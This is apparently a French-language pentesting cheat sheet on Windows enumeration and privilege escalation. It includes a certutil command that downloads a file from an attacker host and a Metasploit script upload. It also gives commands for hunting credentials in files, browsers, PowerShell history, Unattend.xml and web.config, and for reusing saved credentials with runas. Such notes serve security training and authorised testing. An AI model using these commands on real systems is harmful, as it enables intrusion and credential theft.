😕Enumération

Info sur système, domaine, service,process

Collecter des informations sur les processus en cours d'exécution :

System InformerSystem Informer

📬 Lancer un script sur la cible

💻 Metasploit

• Sur l'attaque :

git clone script

ou

nano script.ps1 # coller le script

• Sur la cible

Transférer le script (SI vous ne spécifiez pas le chemin, assurer vous d'être dans le répertoire du script sur l'attquant)

meterpreter > upload /chemin/vers/script.ps1

Charger l'extension PowerShell :

meterpreter > load powershell

ouvre une session interactive PowerShell

meterpreter > powershell_shell 

Lancer le script

. .\script.ps1

💻 Windows basique

• sur la cible :

certutil -urlcache -f http://ip_attack/fichier 

---

🔒 Collecte d'information

💻 Informations système

Afficher les informations système de base

systeminfo

Afficher la version et le correctif installé

wmic qfe get hotfixid, installedon

Afficher les logiciels installés

wmic product get name,version

Rechercher des chaînes de texte particulières, des répertoires cachés, des fichiers de sauvegarde

Get-ChildItem -Hidden -Path C:\Users\kkidd\Desktop\

👨‍⚕️ Utilisateurs et groupes

Afficher les privilèges de l'utilisateur actuellement connecté.

whoami /priv

Afficher les groupes auxquels appartient l'utilisateur actuellement connecté.

whoami /groups

Afficher les utilisateurs locaux

net user

Afficher les utilisateurs du domaine

Get-ADUser -Filter *

Afficher les groupes locaux

net localgroup

Afficher les groupes du domaine

Get-ADGroup -Filter *

Afficher les membres d'un groupe

net localgroup <NOM_DE_GROUPE>

Afficher les détails d'un utilisateur

net user <NOM_D'UTILISATEUR>

Afficher les détails d'un groupe

net localgroup <NOM_DE_GROUPE> /all

📡 Noms d'hôtes

Afficher le nom d'hôte local

hostname

Afficher les noms d'hôte sur le réseau

nbtstat -A <ADRESSE_IP>

Afficher le fichier hosts

type C:\Windows\System32\drivers\etc\hosts

📱 Tables de routage

Le but est de déterminer si le système cible est connecté à d'autres réseaux ou à Internet, et comment les paquets de données sont acheminés entre ces différents réseaux. On peut également identifier des routes potentiellement vulnérables ou mal configurées, qui pourraient être exploitées pour effectuer des attaques de type "man-in-the-middle" ou pour rediriger le trafic réseau vers des systèmes malveillants.

Afficher la table de routage

route print

Afficher les détails d'une route

route print <DESTINATION>

Partages réseau

Afficher les partages réseau locaux

net share

Afficher les partages réseau sur un système distant

net view <NOM_DE_SYSTEME> /all

Afficher les détails d'un partage réseau

net share <NOM_DE_PARTAGE>

Afficher le contenu d'un partage réseau

dir <NOM_DE_PARTAGE>

🌐 Services réseau

Afficher les services réseau en cours d'exécution

netstat -ano

Afficher les détails d'un service réseau spécifique

sc qc <NOM_DE_SERVICE>

Afficher les détails d'une connexion réseau spécifique

netstat -ano | findstr <PID>

📋 Applications et bannières

Afficher les applications en cours d'exécution

tasklist

Afficher les détails d'une application spécifique

tasklist /fi "IMAGENAME eq <NOM_DE_L'APPLICATION>"

Afficher les bannières d'applications réseau

telnet <ADRESSE_IP> <PORT>

Afficher les bannières d'applications réseau à l'aide de nc

nc -nvv <ADRESSE_IP> <PORT>

🧱 Configurations de pare-feu

Afficher les règles de pare-feu

netsh advfirewall firewall show rule name=all

Afficher les détails d'une règle de pare-feu spécifique

netsh advfirewall firewall show rule name=<NOM_DE_LA_REGLE>

Afficher l'état du pare-feu

netsh advfirewall show allprofiles state

📧 Détails SNMP et DNS

Afficher les détails SNMP

snmpwalk -v1 -c public <ADRESSE_IP>

Afficher les détails DNS

nslookup <NOM_DNS>

Afficher les enregistrements DNS

nslookup -type=any <NOM_DNS>

👨‍🎓 Informations d'identification

Rechercher des fichiers contenant des mots de passe

findstr /si password *.txt

Rechercher des mots de passe enregistrés dans les navigateurs Web

WebBrowserPassView

Rechercher des fichiers contenant des clés d'accès

findstr /si key *.*

🔒 Processus

Liste de tous les processus en cours d'exécution sur le système, y compris leur nom, leur ID de processus (PID) et leur utilisation de la mémoire

Get-Process

tasklist

Get-Process -Name nom_du_service

Afficher des informations plus détaillées sur un processus spécifique

tasklist /fi "PID eq PID"

Vérifier les services Windows installés et démarrés sur le système.

net start

🖨️ Imprimantes installées

Afficher une liste de toutes les imprimantes installées sur le système, y compris leur nom, leur état actuel et leur port d'impression

printer_properties.exe

Get-Printer

Afficher les propriétés de configuration des imprimantes

prncnfg.exe -g -v

🔄 Services internes

Affiche les services associés à chaque processus.

tasklist /svc

Liste de tous les services en cours d'exécution sur le système

sc query

Afficher des informations plus détaillées sur un service spécifique

sc qc NOM_DE_SERVICE

Énumérer spécifiquement les services DNS en cours d'exécution sur le système

sc query dns

🌏 Applications Web locales

Énumérer les applications Web locales en cours d'exécution sur le système

netstat -ano | findstr :80

Afficher les autorisations d'accès aux URL pour les applications Web locales sur un ordinateur Windows

netsh http show urlacl

Ressources :

PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

---

🧠 Réflexes pour la privesc

afaire

📚 A savoir

Lors des installations Windows, les informations d'identification administrateur peuvent être stockées dans des fichiers de configuration. Certains emplacements courants incluent:

• C:\\Unattend.xml

• C:\\Windows\\Panther\\Unattend.xml

• C:\\Windows\\Panther\\Unattend\\Unattend.xml

• C:\\Windows\\system32\\sysprep.inf

• C:\\Windows\\system32\\sysprep\\sysprep.xml

Historique de PowerShell

Powershell enregistre les commandes exécutées dans un fichier d'historique. Les mots de passe inclus dans ces commandes peuvent être récupérés :

type %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt

Informations d'Identification Enregistrées

Les informations d'identification enregistrées peuvent être listées avec la commande :

cmdkey /list

Bien que les mots de passe réels ne soient pas visibles, ils peuvent être utilisés avec la commande runas pour exécuter des commandes en tant qu'utilisateur spécifié :

runas /savecred /user:admin cmd.exe

Configuration IIS

La configuration des sites Web dans Internet Information Services (IIS) peut contenir des informations d'identification. Le fichier web.config peut être inspecté :

type C:\\inetpub\\wwwroot\\web.config

Pour rechercher des chaînes de connexion à la base de données :

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString